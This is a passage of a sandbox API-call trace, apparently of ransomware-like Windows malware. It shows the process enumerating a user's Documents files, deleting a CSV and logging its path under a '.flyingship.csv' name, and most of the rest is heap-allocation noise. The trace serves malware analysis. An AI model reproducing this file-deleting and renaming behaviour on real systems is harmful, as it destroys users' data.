HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76dfe470, ftCreationTime.dwHighDateTime=0x1d5dae8, ftLastAccessTime.dwLowDateTime=0x7a81de0, ftLastAccessTime.dwHighDateTime=0x1d5db81, ftLastWriteTime.dwLowDateTime=0xf034f60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xd24a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="-V0 o3_nR9rc3_2DHH4.csv", cAlternateFileName="-V0O3_~1.CSV")) returned 0x90af58 [0177.319] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\-v0 o3_nr9rc3_2dhh4.csv")) returned 1 [0177.323] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76dfe470, ftCreationTime.dwHighDateTime=0x1d5dae8, ftLastAccessTime.dwLowDateTime=0x7a81de0, ftLastAccessTime.dwHighDateTime=0x1d5db81, ftLastWriteTime.dwLowDateTime=0xf034f60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xd24a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="-V0 o3_nR9rc3_2DHH4.csv", cAlternateFileName="-V0O3_~1.CSV")) returned 0 [0177.324] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0177.324] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.325] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.325] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.325] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.325] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.325] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.325] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.325] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.325] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.327] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.327] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0177.327] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.327] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.328] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0177.328] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x164c, lpOverlapped=0x0) returned 1 [0177.328] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0177.328] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x164c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.328] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0177.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.flyingship.csv\r\n", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0177.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.flyingship.csv\r\n", cchWideChar=93, lpMultiByteStr=0x9a5d10, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.flyingship.csv\r\n", lpUsedDefaultChar=0x0) returned 93 [0177.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0177.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0177.329] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x5c, lpOverlapped=0x0) returned 1 [0177.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0177.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.329] CloseHandle (hObject=0x120) returned 1 [0177.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0177.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0177.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0177.332] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0177.332] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0177.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.334] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0177.334] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.334] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0177.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0177.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.334] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0177.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0177.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0177.335] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0177.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0177.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0177.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0177.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0177.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.339] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.339] 